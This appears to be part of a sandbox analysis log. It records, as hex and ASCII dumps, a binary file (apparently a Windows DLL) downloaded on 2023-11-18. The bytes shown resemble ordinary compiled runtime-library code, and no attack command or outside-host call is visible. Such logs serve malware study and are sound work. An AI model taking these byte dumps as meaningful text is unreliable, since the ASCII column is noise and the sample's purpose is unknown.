2023-11-18 09:02:39 UTC	833	IN	Data Raw: ef ff ff 6a 16 58 5d c3 a1 4c 3d 14 10 89 01 33 c0 5d c3 8b ff 55 8b ec 8b 45 08 56 be 90 01 00 00 57 8d 48 ff 05 2b 01 00 00 99 f7 fe 6a 64 8b f0 8b c1 99 5f f7 ff 5f 2b f0 8b c1 99 83 e2 03 03 c2 c1 f8 02 83 c0 ef 03 c6 5e 5d c3 8b ff 55 8b ec 8b 4d 08 8b c1 25 03 00 00 80 79 05 48 83 c8 fc 40 75 12 56 6a 64 8b c1 5e 99 f7 fe 5e 85 d2 74 04 b0 01 5d c3 8d 81 6c 07 00 00 b9 90 01 00 00 99 f7 f9 f7 da 1a d2 8d 42 01 5d c3 8b ff 55 8b ec 83 ec 0c 56 8b 75 08 85 f6 75 16 e8 3f b9 ff ff 6a 16 5e 89 30 e8 2f ef ff ff 8b c6 e9 22 01 00 00 57 6a 09 83 c8 ff 8b fe 59 f3 ab 8b 7d 0c 85 ff 75 11 e8 17 b9 ff ff 6a 16 5e 89 30 e8 07 ef ff ff eb 33 8b 4f 04 8b 07 89 45 f4 89 4d f8 83 f9 ff 7f 09 7c 17 3d 40 57 ff ff 72 10 6a 07 5a 3b ca 7c 1a 7f 07 3d cf 26 41 93 76 Data Ascii: jX]L=3]UEVWH+jd__+^]UM%yH@uVjd^^t]lB]UVuu?j^0/"WjY}uj^03OEM\|=@WrjZ;\|=&Av
2023-11-18 09:02:39 UTC	835	IN	Data Raw: 8d 45 f8 50 89 35 c8 11 14 10 e8 53 fa ff ff 59 85 c0 75 44 69 45 f8 e8 03 00 00 8b 0d cc 11 14 10 03 c8 89 0d cc 11 14 10 79 0e 81 c1 00 5c 26 05 ff 0d c8 11 14 10 eb 11 b8 00 5c 26 05 3b c8 7c 0e 2b c8 ff 05 c8 11 14 10 89 0d cc 11 14 10 89 3d c4 11 14 10 eb 9d 6a 00 6a 00 6a 00 6a 00 6a 00 e8 2c ea ff ff cc 8b ff 55 8b ec 83 ec 0c 53 56 e8 b9 f9 ff ff 83 65 fc 00 8b d8 83 65 f4 00 8d 45 fc 50 89 5d f8 e8 01 fa ff ff 59 85 c0 0f 85 9a 01 00 00 8d 45 f4 50 e8 97 f9 ff ff 59 85 c0 0f 85 88 01 00 00 8b 15 5c 3d 14 10 8b 75 08 85 d2 74 34 8b ca 8b c6 8a 18 3a 19 75 1a 84 db 74 12 8a 58 01 3a 59 01 75 0e 83 c0 02 83 c1 02 84 db 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 0f 84 44 01 00 00 8b 5d f8 52 e8 c1 db ff ff 59 8b ce 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d Data Ascii: EP5SYuDiEy\&\&;\|+=jjjjj,USVeeEP]YEPY\=ut4:utX:Yuu3D]RYQAu+
2023-11-18 09:02:39 UTC	836	IN	Data Raw: 74 5b d9 c0 e8 93 00 00 00 d9 c9 e8 9e 00 00 00 de e9 de f1 c3 c6 85 70 ff ff ff ff e8 4a 00 00 00 0a db 74 33 e8 72 00 00 00 d9 e8 d9 e0 d9 c9 d9 fd e9 84 dc ff ff dd d8 db 2d b0 a9 11 10 e9 6c dd ff ff dd d8 db 2d b0 a9 11 10 c3 c3 e8 31 2c 00 00 e9 58 dd ff ff e9 27 2c 00 00 c6 85 70 ff ff ff 08 e8 74 dc ff ff eb e8 d9 ea de c9 33 db e8 2b 2c 00 00 f6 d3 f6 85 61 ff ff ff 01 74 09 e8 28 00 00 00 d9 c9 dd d8 f6 c2 40 75 08 f6 d7 d9 e8 de c1 d9 fd e9 1f dc ff ff e8 0d 00 00 00 de c1 0a ff 75 06 d9 e8 dc c1 de c1 c3 d9 c0 d9 e8 0a ff 75 06 d8 c1 d9 e0 d9 c9 de f1 c3 cc cc cc cc 55 8b ec 81 c4 30 fd ff ff 53 9b d9 bd 5c ff ff ff 9b 50 51 52 e8 b7 50 00 00 3c 00 5a 59 58 75 14 e8 41 db ff ff 80 8d 38 fd ff ff 03 e8 9d 00 00 00 5b c9 c3 d9 c9 dd 95 7a ff ff Data Ascii: t[pJt3r-l-1,X',pt3+,at(@uuuU0S\PQRP<ZYXuA8[z
2023-11-18 09:02:39 UTC	837	IN	Data Raw: f0 ef 11 10 f2 0f 10 ce f2 0f 59 f6 25 80 00 00 00 c1 e0 08 f2 0f 59 c6 f2 0f 59 ce 83 ec 10 f2 0f 59 e9 f2 0f 59 ce f2 0f 58 c2 66 0f ef f6 f2 0f 59 c1 f2 0f 58 eb 66 0f c4 f0 03 f2 0f 58 c5 66 0f 70 db ee f2 0f 5c c4 f2 0f 58 c3 66 0f 56 c6 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 05 bb 3b 00 00 3d 00 38 00 00 73 6a 66 0f 14 ff 66 0f 28 35 80 a5 11 10 66 0f 14 cf 66 0f 28 15 90 a5 11 10 66 0f 28 25 a0 a5 11 10 66 0f 59 ff 83 ec 10 66 0f 59 cf 66 0f 59 f7 66 0f 59 ff f2 0f 10 d9 f2 0f 59 c9 66 0f 58 f2 66 0f 59 e7 f2 0f 59 cb 66 0f 58 f4 66 0f 59 ce 66 0f 70 d1 ee f2 0f 58 ca f2 0f 58 c1 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 2d fe 3b 00 00 83 f8 02 0f 83 4f 01 00 00 f2 0f 59 c9 f2 0f 5c d9 f2 0f 51 db 66 0f c5 c7 03 66 0f 54 3d 50 a5 11 10 66 0f 70 Data Ascii: Y%YYYYXfYXfXfp\XfVfD$D$;=8sjff(5ff(f(%fYfYfYfYYfXfYYfXfYfpXXfD$D$-;OY\QffT=Pfp
2023-11-18 09:02:39 UTC	839	IN	Data Raw: 00 83 c4 0c 85 f6 5e 74 0d e8 70 a4 ff ff c7 00 21 00 00 00 eb 10 f6 c3 1c 74 0b e8 5e a4 ff ff c7 00 22 00 00 00 5b 5d c3 8b ff 55 8b ec 51 51 8d 45 08 50 e8 ef fe ff ff 98 59 83 e8 00 74 78 83 e8 01 74 05 83 e8 01 eb 09 b8 00 80 00 00 66 85 45 0e 74 63 dd 05 98 ce 13 10 dd 45 08 d8 d1 df e0 f6 c4 05 7a 14 dd d8 6a 01 dd d8 e8 1a ff ff ff dd 05 38 a6 11 10 59 eb 40 dd e1 df e0 dd d9 f6 c4 44 7a 14 6a 04 dd d8 e8 fd fe ff ff dd 05 30 a6 11 10 59 d9 e0 eb 21 d9 e8 de c1 dd 55 f8 e8 2b 09 00 00 dd 45 f8 d9 c0 d9 e8 de e9 dc 65 08 de f1 de e9 eb 03 dd 45 08 8b e5 5d c3 cc cc 55 8b ec 83 ec 08 83 e4 f0 dd 1c 24 f3 0f 7e 04 24 e8 08 00 00 00 c9 c3 66 0f 12 44 24 04 66 0f 12 25 20 a7 11 10 66 0f 12 1d 30 a7 11 10 66 0f 57 ed 66 0f 12 15 28 a7 11 10 f2 0f 10 c8 Data Ascii: ^tp!t^"[]UQQEPYtxtfEtcEzj8Y@Dzj0Y!U+EeE]U$~$fD$f% f0fWf(
2023-11-18 09:02:39 UTC	840	IN	Data Raw: c1 ba 3a 00 00 00 83 ec 1c 66 0f 13 44 24 10 89 54 24 0c 8b d4 83 c2 10 89 54 24 08 83 c2 10 89 54 24 04 89 14 24 e8 da 41 00 00 66 0f 12 44 24 10 83 c4 1c 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f c5 d7 01 c1 ea 0f f7 da 66 0f 6e fa 66 0f 70 ff 00 66 0f 12 15 80 a6 11 10 66 0f 12 05 88 a6 11 10 66 0f 54 d7 66 0f 54 c7 f2 0f 58 c2 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f 12 15 60 a6 11 10 66 0f 12 05 68 a6 11 10 f2 0f 58 c2 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f 57 f6 f2 0f 58 c6 ba f0 03 00 00 e9 4a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 83 e4 f0 dd 1c Data Ascii: :fD$T$T$T$$AfD$fD$D$ffnfpfffTfTXfD$D$f`fhXfD$D$fWXJU
2023-11-18 09:02:39 UTC	857	IN	Data Raw: 24 f3 0f 7e 04 24 e8 08 00 00 00 c9 c3 66 0f 12 44 24 04 66 0f c5 c0 03 66 25 ff 7f 66 2d 20 38 66 3d a8 08 0f 87 d7 01 00 00 66 0f 14 c0 66 0f 28 0d 70 a7 11 10 66 0f 59 c8 f2 0f 2d d1 66 0f 28 15 80 a7 11 10 66 0f 58 ca 66 0f 28 1d 90 a7 11 10 66 0f 5c ca 66 0f 12 2d c0 a7 11 10 81 c2 00 29 07 00 66 0f 28 25 a0 a7 11 10 66 0f 59 d9 83 e2 1f f2 0f 59 e9 8b ca 66 0f 59 e1 d1 e1 66 0f 5c c3 66 0f 59 0d b0 a7 11 10 03 d1 c1 e1 02 03 d1 f2 0f 58 e8 66 0f 28 d0 66 0f 5c c4 66 0f 12 35 c8 a7 11 10 c1 e2 04 8d 05 f0 06 12 10 66 0f 54 2d d0 a7 11 10 66 0f 28 d8 03 c2 66 0f 5c d0 66 0f 15 c0 f2 0f 5e f5 66 0f 5c d4 66 0f 28 78 10 f2 0f 5c dd 66 0f 59 f8 66 0f 5c d1 66 0f 28 48 30 66 0f 59 c8 66 0f 28 60 60 66 0f 59 e0 f2 0f 58 d3 66 0f 28 d8 66 0f 59 c0 66 0f 58 Data Ascii: $~$fD$ff%f- 8f=ff(pfY-f(fXf(f\f-)f(%fYYfYf\fYXf(f\f5fT-f(f\f^f\f(x\fYf\f(H0fYf(``fYXf(fYfX
2023-11-18 09:02:39 UTC	858	IN	Data Raw: 00 8d 45 f4 50 0f b6 06 50 e8 ff d9 ff ff 59 59 85 c0 74 40 8b 7d f4 83 7f 04 01 7e 27 3b 5f 04 7c 25 33 c0 39 45 08 0f 95 c0 50 ff 75 08 ff 77 04 56 6a 09 ff 77 08 ff 15 98 80 11 10 8b 7d f4 85 c0 75 0b 3b 5f 04 72 2e 80 7e 01 00 74 28 8b 7f 04 eb 31 33 c0 39 45 08 0f 95 c0 33 ff 50 ff 75 08 8b 45 f4 47 57 56 6a 09 ff 70 08 ff 15 98 80 11 10 85 c0 75 0e e8 7d 98 ff ff 83 cf ff c7 00 2a 00 00 00 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c7 5f e9 31 ff ff ff 8b ff 55 8b ec 6a 00 ff 75 10 ff 75 0c ff 75 08 e8 f1 fe ff ff 83 c4 10 5d c3 8b ff 55 8b ec 83 ec 14 53 8b 5d 0c 57 8b 7d 10 85 db 75 12 85 ff 74 0e 8b 45 08 85 c0 74 03 83 20 00 33 c0 eb 7a 8b 45 08 85 c0 74 03 83 08 ff 56 81 ff ff ff ff 7f 76 11 e8 04 98 ff ff 6a 16 5e 89 30 e8 f4 cd ff ff Data Ascii: EPPYYt@}~';_\|%39EPuwVjw}u;_r.~t(139E3PuEGWVjpu}*}tMP_1Ujuuu]US]W}utEt 3zEtVvj^0
2023-11-18 09:02:39 UTC	860	IN	Data Raw: 8a c2 5d c3 8b ff 55 8b ec 83 ec 30 53 56 57 8b 7d 1c 33 db 85 ff 79 02 8b fb 8b 75 0c 8d 4d d0 ff 75 28 88 1e e8 d6 78 ff ff 8d 47 0b 39 45 10 77 14 e8 69 93 ff ff 6a 22 5f 89 38 e8 59 c9 ff ff e9 a8 02 00 00 8b 55 08 8b 02 8b 4a 04 89 45 e0 8b c1 c1 e8 14 25 ff 07 00 00 3d ff 07 00 00 75 52 3b db 75 4e 53 ff 75 24 53 57 ff 75 18 ff 75 14 ff 75 10 56 52 e8 8b 02 00 00 8b f8 83 c4 24 85 ff 74 07 88 1e e9 62 02 00 00 6a 65 56 e8 5f 64 ff ff 59 59 85 c0 74 13 38 5d 20 0f Data Ascii: ]U0SVW}3yuMu(xG9Ewij"_8YUJE%=uR;uNSu$SWuuuVR$tbjeV_dYYt8]
2023-11-18 09:02:39 UTC	860	IN	Data Raw: 94 c1 fe c9 80 e1 e0 80 c1 70 88 08 88 58 03 8b fb e9 3a 02 00 00 81 e1 00 00 00 80 8b c3 0b c1 74 04 c6 06 2d 46 8b 4a 04 33 db 38 5d 20 6a 30 0f 94 c3 c7 45 f4 ff 03 00 00 4b 33 c0 83 e3 e0 81 e1 00 00 f0 7f 83 c3 27 0b c1 89 5d e4 58 75 1f 88 06 46 8b 42 04 8b 0a 25 ff ff 0f 00 0b c8 75 05 21 4d f4 eb 0d c7 45 f4 fe 03 00 00 eb 04 c6 06 31 46 8b ce 46 89 4d e8 85 ff 75 05 c6 01 00 eb 0f 8b 45 d4 8b 80 88 00 00 00 8b 00 8a 00 88 01 8b 42 04 25 ff ff 0f 00 89 45 f0 77 09 83 3a 00 0f 86 c5 00 00 00 83 65 fc 00 b9 00 00 0f 00 6a 30 58 89 45 f8 89 4d f0 85 ff 7e 53 8b 02 8b 52 04 23 45 fc 23 d1 8b 4d f8 81 e2 ff ff 0f 00 0f bf c9 e8 bc 93 00 00 6a 30 59 66 03 c1 0f b7 c0 83 f8 39 76 02 03 c3 8b 4d f0 8b 55 08 88 06 46 8b 45 fc 0f ac c8 04 89 45 fc 8b 45 f8 Data Ascii: pX:t-FJ38] j0EK3']XuFB%u!ME1FFMuEB%Ew:ej0XEM~SR#E#Mj0Yf9vMUFEEE
2023-11-18 09:02:39 UTC	861	IN	Data Raw: 10 8b 80 88 00 00 00 8b 00 8a 00 88 06 46 8b 45 14 8b 48 04 85 c9 79 29 80 7d 18 00 75 08 8b c1 f7 d8 3b c7 7d 04 8b f9 f7 df 57 56 ff 75 0c 53 e8 e5 01 00 00 57 6a 30 56 e8 2e 62 ff ff 83 c4 1c 80 7d fc 00 5f 5e 5b 74 0a 8b 45 f0 83 a0 50 03 00 00 fd 33 c0 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 53 56 57 ff 75 18 33 c0 8d 7d f0 ff 75 14 ab ab ab 8d 45 f0 8b 7d 1c 50 8b 45 08 57 ff 70 04 ff 30 e8 62 4a 00 00 8b 45 f4 33 c9 8b 5d 0c 83 c4 18 83 7d f0 2d 0f 94 c1 48 89 45 fc 83 c8 ff 8d 34 19 39 45 10 74 05 8b 45 10 2b c1 8d 4d f0 51 57 50 56 e8 92 44 00 00 83 c4 10 85 c0 74 05 c6 03 00 eb 55 8b 45 f4 48 39 45 fc 0f 9c c1 83 f8 fc 7c 2a 3b c7 7d 26 84 c9 74 0a 8a 06 46 84 c0 75 f9 88 46 fe ff 75 28 8d 45 f0 6a 01 50 57 ff 75 10 53 e8 89 fe ff ff 83 c4 18 eb 1c Data Ascii: FEHy)}u;}WVuSWj0V.b}_^[tEP3]USVWu3}uE}PEWp0bJE3]}-HE49EtE+MQWPVDtUEH9E\|*;}&tFuFu(EjPWuS
2023-11-18 09:02:39 UTC	863	IN	Data Raw: 10 59 3b f0 7e 02 8b f0 57 33 ff 85 f6 74 56 8b 45 fc 8b 08 83 f9 ff 74 40 83 f9 fe 74 3b 8a 13 f6 c2 01 74 34 f6 c2 08 75 0b 51 ff 15 e8 81 11 10 85 c0 74 21 8b c7 8b cf 83 e0 3f c1 f9 06 6b d0 30 8b 45 fc 03 14 8d 30 3e 14 10 8b 00 89 42 18 8a 03 88 42 28 8b 45 fc 47 83 c0 04 43 89 45 fc 3b fe 75 ad 5f 5e 5b 8b e5 5d c3 8b ff 53 56 57 33 ff 8b c7 8b cf 83 e0 3f c1 f9 06 6b f0 30 03 34 8d 30 3e 14 10 83 7e 18 ff 74 0c 83 7e 18 fe 74 06 80 4e 28 80 eb 7b 8b c7 c6 46 28 81 83 e8 00 74 10 83 e8 01 74 07 6a f4 83 e8 01 eb 06 6a f5 eb 02 6a f6 58 50 ff 15 e4 81 11 10 8b d8 83 fb ff 74 0d 85 db 74 09 53 ff 15 e8 81 11 10 eb 02 33 c0 85 c0 74 1e 25 ff 00 00 00 89 5e 18 83 f8 02 75 06 80 4e 28 40 eb 29 83 f8 03 75 24 80 4e 28 08 eb 1e 80 4e 28 40 c7 46 18 fe ff Data Ascii: Y;~W3tVEt@t;t4uQt!?k0E0>BB(EGCE;u_^[]SVW3?k040>~t~tN({F(ttjjjXPttS3t%^uN(@)u$N(N(@F
2023-11-18 09:02:39 UTC	864	IN	Data Raw: f8 01 75 ed 0a ed 74 e9 d9 e0 eb e5 dd d8 e9 7d b0 ff ff dd d8 e9 25 b1 ff ff 58 d9 e4 9b dd bd 60 ff ff ff 9b f6 85 61 ff ff ff 01 75 0f dd d8 db 2d b0 a9 11 10 0a ed 74 02 d9 e0 c3 c6 85 70 ff ff ff 04 e9 47 b0 ff ff dd d8 dd d8 db 2d b0 a9 11 10 c6 85 70 ff ff ff 03 c3 0a c9 75 af dd d8 db 2d b0 a9 11 10 c3 d9 c0 d9 e1 db 2d ce a9 11 10 de d9 9b dd bd 60 ff ff ff 9b f6 85 61 ff ff ff 41 75 95 d9 c0 d9 fc d9 e4 9b dd bd 60 ff ff ff 9b 8a 95 61 ff ff ff d9 c9 d8 e1 d9 e4 9b dd bd 60 ff ff ff d9 e1 d9 f0 c3 d9 c0 d9 fc d8 d9 9b df e0 9e 75 1a d9 c0 dc 0d e2 a9 11 10 d9 c0 d9 fc de d9 9b df e0 9e 74 0d b8 01 00 00 00 c3 b8 00 00 00 00 eb f8 b8 02 00 00 00 eb f1 56 83 ec 74 8b f4 56 83 ec 08 dd 1c 24 83 ec 08 dd 1c 24 9b dd 76 08 e8 a9 0b 00 00 83 c4 14 dd Data Ascii: ut}%X`au-tpG-pu--`aAu`a`utVtV$$v
2023-11-18 09:02:39 UTC	865	IN	Data Raw: 25 ff 00 00 00 b9 01 ff 03 00 03 c8 81 e1 00 00 04 00 83 fa 10 72 5e ba 7f fe 0b 00 66 0f 12 1d 20 aa 11 10 66 0f 12 15 30 aa 11 10 e9 26 fc ff ff 66 0f 12 7c 24 04 66 0f 12 64 24 04 66 0f 7e fa 66 0f 73 d7 20 66 0f 7e f8 8b c8 25 ff ff ff 7f 3d 00 00 f0 7f 0f 82 72 02 00 00 0f 87 de 01 00 00 83 fa 00 0f 87 d5 01 00 00 e9 5e 02 00 00 b9 00 00 00 00 66 0f 57 c0 b8 f0 43 00 00 66 0f c4 c0 03 66 0f 12 3d 20 aa 11 10 66 0f 12 15 30 aa 11 10 f2 0f 59 c4 66 0f 7e e2 66 0f 73 d4 20 66 0f 7e e0 83 fa 00 74 52 66 0f 54 f8 f2 0f 10 e0 66 0f 54 05 40 aa 11 10 66 0f 73 d0 2c 66 0f c5 c0 00 66 0f 56 fa 25 ff 00 00 00 83 c0 01 25 fe 01 00 00 f2 0f 59 3c 85 c0 2b 12 10 66 0f 12 2c 85 c0 2b 12 10 03 c0 66 0f 28 34 85 d0 2f 12 10 ba 7f 3e 04 00 e9 5c fb ff ff 8b d0 81 e2 Data Ascii: %r^f f0&f\|$fd$f~fs f~%=r^fWCff= f0Yf~fs f~tRfTfT@fs,ffV%%Y<+f,+f(4/>\
2023-11-18 09:02:39 UTC	867	IN	Data Raw: 66 0f c4 f7 03 5f f2 0f 5c d1 f2 0f 58 c2 f2 0f 58 c3 83 fe 00 7f 4e 5e f2 0f 59 c7 f2 0f 59 cf f2 0f 58 c1 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 0f 84 10 fe ff ff ba 19 00 00 00 83 f8 00 0f 84 02 fe ff ff 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 5e f2 0f 58 c1 f2 0f 59 c7 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 0f 84 c6 fd ff ff ba 19 00 00 00 83 f8 00 0f 84 b8 fd ff ff 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f 12 05 b8 aa 11 10 66 0f 6e c9 f2 0f 59 c0 66 0f 73 f1 2d 66 0f 56 c1 ba 19 00 00 00 e9 84 fd ff ff ba 18 00 00 00 83 f9 00 74 15 66 0f 12 05 a8 aa 11 10 f2 0f 59 05 b0 aa 11 10 e9 65 fd ff ff 66 0f 12 05 b0 aa 11 10 f2 0f 59 c0 e9 54 Data Ascii: f_\XXN^YYXYXf%=fD$D$^XYYXf%=fD$D$ffnYfs-fVtfYefYT
2023-11-18 09:02:39 UTC	871	IN	Data Raw: 45 e0 8d 4e 0c 6a 06 8d 90 8c 12 14 10 5f 66 8b 02 8d 52 02 66 89 01 8d 49 02 83 ef 01 75 ef 56 e8 ce fa ff ff 59 33 c0 5f 8b 4d fc 5e 33 cd 5b e8 7a 26 ff ff 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 56 ff 75 08 8d 4d f0 e8 d3 4c ff ff 0f b6 75 0c 8b 45 f8 8a 4d 14 84 4c 30 19 75 1b 33 d2 39 55 10 74 0e 8b 45 f4 8b 00 0f b7 04 70 23 45 10 eb 02 8b c2 85 c0 74 03 33 d2 42 80 7d fc 00 5e 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c2 8b e5 5d c3 8b ff 55 8b ec 6a 04 6a 00 ff 75 08 6a 00 e8 94 ff ff ff 83 c4 10 5d c3 ff 15 04 82 11 10 a3 a0 41 14 10 ff 15 08 82 11 10 a3 a4 41 14 10 b0 01 c3 8b ff 55 8b ec 8b 55 08 57 33 ff 66 39 3a 74 21 56 8b ca 8d 71 02 66 8b 01 83 c1 02 66 3b c7 75 f5 2b ce d1 f9 8d 14 4a 83 c2 02 66 39 3a 75 e1 5e 8d 42 02 5f 5d c3 8b ff 55 8b ec Data Ascii: ENj_fRfIuVY3_M^3[z&]UVuMLuEML0u39UtEp#Et3B}^tMP]Ujjuj]AAUUW3f9:t!Vqff;u+Jf9:u^B_]U
2023-11-18 09:02:39 UTC	875	IN	Data Raw: 5a ff ff ff 59 5e 5d c3 6a 0c 68 38 e0 13 10 e8 ea 20 ff ff 83 65 e4 00 e8 f9 90 ff ff 8b f8 8b 0d a4 17 14 10 85 8f 50 03 00 00 74 07 8b 77 4c 85 f6 75 43 6a 04 e8 e1 e2 ff ff 59 83 65 fc 00 ff 35 48 3d 14 10 8d 47 4c 50 e8 30 00 00 00 59 59 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 0c 00 00 00 85 f6 75 11 e8 d9 7f ff ff 8b 75 e4 6a 04 e8 ef e2 ff ff 59 c3 8b c6 e8 c6 20 ff ff c3 8b ff 55 8b ec 56 8b 75 0c 57 85 f6 74 3c 8b 45 08 85 c0 74 35 8b 38 3b fe 75 04 8b c6 eb 2d 56 89 30 e8 98 fc ff ff 59 85 ff 74 ef 57 e8 d6 fe ff ff 83 7f 0c 00 59 75 e2 81 ff 68 10 14 10 74 da 57 e8 f5 fc ff ff 59 eb d1 33 c0 5f 5e 5d c3 8b ff 55 8b ec 83 ec 10 53 56 57 33 ff bb e3 00 00 00 89 7d f4 89 5d f8 8d 04 3b c7 45 fc 55 00 00 00 99 2b c2 8b c8 d1 f9 6a 41 5f 89 4d f0 8b Data Ascii: ZY^]jh8 ePtwLuCjYe5H=GLP0YYuEuujY UVuWt<Et58;u-V0YtWYuhtWY3_^]USVW3}];EU+jA_M
2023-11-18 09:02:39 UTC	876	IN	Data Raw: 17 14 10 74 07 50 e8 1e 7b ff ff 59 8b 46 08 3b 05 b8 17 14 10 74 07 50 e8 0c 7b ff ff 59 8b 46 30 3b 05 e0 17 14 10 74 07 50 e8 fa 7a ff ff 59 8b 46 34 3b 05 e4 17 14 10 74 07 50 e8 e8 7a ff ff 59 5e 5d c3 8b ff 55 8b ec 8b 45 0c 53 56 8b 75 08 57 33 ff 8d 04 86 8b c8 2b ce 83 c1 03 c1 e9 02 3b c6 1b db f7 d3 23 d9 74 10 ff 36 e8 b6 7a ff ff 47 8d 76 04 59 3b fb 75 f0 5f 5e 5b 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 d0 00 00 00 6a 07 56 e8 ab ff ff ff 8d 46 1c 6a 07 50 e8 a0 ff ff ff 8d 46 38 6a 0c 50 e8 95 ff ff ff 8d 46 68 6a 0c 50 e8 8a ff ff ff 8d 86 98 00 00 00 6a 02 50 e8 7c ff ff ff ff b6 a0 00 00 00 e8 55 7a ff ff ff b6 a4 00 00 00 e8 4a 7a ff ff ff b6 a8 00 00 00 e8 3f 7a ff ff 8d 86 b4 00 00 00 6a 07 50 e8 4d ff ff ff 8d 86 d0 00 00 00 6a Data Ascii: tP{YF;tP{YF0;tPzYF4;tPzY^]UESVuW3+;#t6zGvY;u_^[]UVujVFjPF8jPFhjPjP\|UzJz?zjPMj
2023-11-18 09:02:39 UTC	883	IN	Data Raw: 0b c1 b0 2d 75 02 04 f3 0f be c0 8b ce 89 07 81 e1 00 00 f0 7f 33 c0 89 5f 08 0b c1 8b 7d 08 75 22 8b ce 8b c7 81 e1 ff ff 0f 00 0b c1 75 14 8b 85 80 f8 ff ff 68 90 9d 12 10 83 60 04 00 e9 d3 12 00 00 8d 45 08 50 e8 0b ae ff ff 59 85 c0 74 0d 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 00 8b 45 10 81 e6 ff ff ff 7f 83 a5 7c f8 ff ff 00 40 89 7d 08 89 75 0c dd 45 08 dd 95 98 f8 ff ff 8b bd 9c f8 ff ff 8b cf 89 85 88 f8 ff ff c1 e9 14 8b c1 25 ff 07 00 00 83 c8 00 75 06 b2 01 33 f6 eb 09 32 d2 be 00 00 10 00 33 c0 8b 9d 98 f8 ff ff 81 e7 ff ff 0f 00 03 d8 13 fe 33 c0 84 d2 0f 95 c0 81 e1 ff 07 00 00 40 8d b1 cc fb ff ff 03 f0 89 b5 b4 f8 ff ff e8 51 25 00 00 Data Ascii: -u3_}u"uh`EPYtAzE\|@}uE%u3233@Q%
2023-11-18 09:02:39 UTC	887	IN	Data Raw: 00 83 c4 10 8b bd 84 f8 ff ff 8b f7 8b 8d 2c fe ff ff 89 b5 b4 f8 ff ff 85 c9 74 77 33 f6 33 ff 8b 84 bd 30 fe ff ff 6a 0a 5a f7 e2 03 c6 89 84 bd 30 fe ff ff 83 d2 00 47 8b f2 3b f9 75 e1 89 b5 9c f8 ff ff 85 f6 8b b5 b4 f8 ff ff 74 42 8b 8d 2c fe ff ff 83 f9 73 73 11 8b c2 89 84 8d 30 fe ff ff ff 85 2c fe ff ff eb 26 33 c0 50 89 85 9c f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 53 50 e8 47 02 00 00 83 c4 10 8b fe 8d 85 5c fc ff ff 50 8d 85 2c fe ff ff 50 e8 e5 e9 ff ff 59 59 6a 0a 5a 3b c2 0f 85 91 00 00 00 ff 85 94 f8 ff ff 8d 77 01 8b 85 5c fc ff ff c6 07 31 89 b5 b4 f8 ff ff 85 c0 0f 84 8b 00 00 00 33 ff 8b f0 33 c9 8b 84 8d 60 fc ff ff f7 e2 6a 0a 03 c7 89 84 8d 60 fc ff ff 83 d2 00 41 8b fa 5a 3b ce 75 e1 8b b5 b4 f8 ff ff 85 Data Ascii: ,tw330jZ0G;utB,ss0,&3P,P0SPG\P,PYYjZ;w\133`j`AZ;u
2023-11-18 09:02:39 UTC	891	IN	Data Raw: 83 48 04 02 f6 c1 01 74 0c 8b 45 08 bf 91 00 00 c0 83 48 04 04 f6 c1 04 74 0c 8b 45 08 bf 8e 00 00 c0 83 48 04 08 f6 c1 08 74 0c 8b 45 08 bf 90 00 00 c0 83 48 04 10 8b 4d 08 56 8b 75 0c 8b 06 c1 e0 04 f7 d0 33 41 08 83 e0 10 31 41 08 8b 4d 08 8b 06 03 c0 f7 d0 33 41 08 83 e0 08 31 41 08 8b 4d 08 8b 06 d1 e8 f7 d0 33 41 08 83 e0 04 31 41 08 8b 4d 08 8b 06 c1 e8 03 f7 d0 33 41 08 83 e0 02 31 41 08 8b 06 8b 4d 08 c1 e8 05 f7 d0 33 41 08 23 c3 31 41 08 e8 7d 03 00 00 8b d0 f6 c2 01 74 07 8b 4d 08 83 49 0c 10 f6 c2 04 74 07 8b 45 08 83 48 0c 08 f6 c2 08 74 07 8b 45 08 83 48 0c 04 f6 c2 10 74 07 8b 45 08 83 48 0c 02 f6 c2 20 74 06 8b 45 08 09 58 0c 8b 06 b9 00 0c 00 00 23 c1 74 35 3d 00 04 00 00 74 22 3d 00 08 00 00 74 0c 3b c1 75 29 8b 45 08 83 08 03 eb 21 8b Data Ascii: HtEHtEHtEHMVu3A1AM3A1AM3A1AM3A1AM3A#1A}tMItEHtEHtEH tEX#t5=t"=t;u)E!
